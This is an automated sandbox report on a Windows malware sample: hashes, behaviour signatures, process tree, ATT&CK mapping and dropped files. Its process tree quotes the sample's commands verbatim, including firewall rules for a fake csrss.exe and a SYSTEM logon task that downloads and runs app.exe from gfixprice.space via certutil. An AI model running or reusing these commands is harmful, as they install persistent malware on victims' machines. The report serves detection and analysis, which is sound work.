2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf

General

Target

2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
Size

3.9MB
MD5

f0ba0b617c4f6be9bb0091003dd55a18
SHA1

dcc4ecfc0016ae1a649929f29ae87eaae1fac9a7
SHA256

2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf
SHA512

9ebefffdf4bc6aa73e03dcb105ad327b170dbbb03746e43f4ce59571f19c27b5ee722dfaa7bc384b90cfd44648bb2550c2beb29be71ab649c7564e10cdb9a8ff

Score

10^/10

evasion

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 2720 created 2116 2720 svchost.exe 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

4356 bcdedit.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1964 schtasks.exe
4168 schtasks.exe

description	pid	process	target process
PID 2720 created 2116	2720	svchost.exe	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe

pid	process
4356	bcdedit.exe

pid	process
1964	schtasks.exe
4168	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe

pid	process
2116	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
2116	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
2228	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
2228	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2116	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
Token: SeImpersonatePrivilege	2116	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
Token: SeTcbPrivilege	2720	svchost.exe
Token: SeTcbPrivilege	2720	svchost.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

svchost.exe2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.execmd.exe

description	pid	process	target process
PID 2720 wrote to memory of 2228	2720	svchost.exe	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
PID 2720 wrote to memory of 2228	2720	svchost.exe	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
PID 2720 wrote to memory of 2228	2720	svchost.exe	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
PID 2228 wrote to memory of 4372	2228	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe	cmd.exe
PID 2228 wrote to memory of 4372	2228	2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe	cmd.exe
PID 4372 wrote to memory of 668	4372	cmd.exe	netsh.exe
PID 4372 wrote to memory of 668	4372	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
"C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116

C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
"C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:4372

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:668

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"
3⤵
PID:2632

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:4584

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1964

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:4168

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:4356

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:2780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes
1⤵
PID:3176

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
2.1MB

MD5
8cb4593803c40d617a7d63135506062b

SHA1
d45d21ca9fa8433f6b0621db7a582e1d86f85d0e

SHA256
746a3143a3f79a95d088362ef9e7697418f739b0977ffdca6dc7f33ff2ec3e74

SHA512
e7ab7741c423ee30e6ad8624f3335e7226b5565a2315a8776cbe3a269a92306747a6a3b8e38ac02c0a87198f796a4f915d053125d17381969249025a1283e200

Download Submit
C:\Windows\rss\csrss.exe
Filesize
2.1MB

MD5
b700c94525338822f970874d9a780d7c

SHA1
77ddc4f07987f7d61c50f4e79b750509fbc42fd4

SHA256
3ed0f7c20887eaed1cc5555c7cf14d903d6d84e74d6bf2ce61491be2d872d548

SHA512
b7f37837f37935b67cfb841c92a291f64a0e1ae6bf71cd2626ce9c564f69aaa421d48ad0874cd1a8c5dc70ebaf7ad9887167096a92f9f5f0b1897fd2e8c1009e

Download Submit
memory/668-137-0x0000000000000000-mapping.dmp

Download
memory/1964-146-0x0000000000000000-mapping.dmp

Download
memory/2116-131-0x0000000001510000-0x0000000001C05000-memory.dmp

Filesize
7.0MB

Download
memory/2116-132-0x0000000000400000-0x0000000000B10000-memory.dmp

Filesize
7.1MB

Download
memory/2116-130-0x000000000115E000-0x0000000001504000-memory.dmp

Filesize
3.6MB

Download
memory/2228-135-0x0000000000400000-0x0000000000B10000-memory.dmp

Filesize
7.1MB

Download
memory/2228-134-0x0000000001361000-0x0000000001707000-memory.dmp

Filesize
3.6MB

Download
memory/2228-133-0x0000000000000000-mapping.dmp

Download
memory/2632-138-0x0000000000000000-mapping.dmp

Download
memory/2780-147-0x0000000000000000-mapping.dmp

Download
memory/3176-139-0x0000000000000000-mapping.dmp

Download
memory/4168-145-0x0000000000000000-mapping.dmp

Download
memory/4356-149-0x0000000000000000-mapping.dmp

Download
memory/4372-136-0x0000000000000000-mapping.dmp

Download
memory/4584-140-0x0000000000000000-mapping.dmp

Download
memory/4584-143-0x0000000001500000-0x00000000018A6000-memory.dmp

Filesize
3.6MB

Download
memory/4584-144-0x0000000000400000-0x0000000000B10000-memory.dmp

Filesize
7.1MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads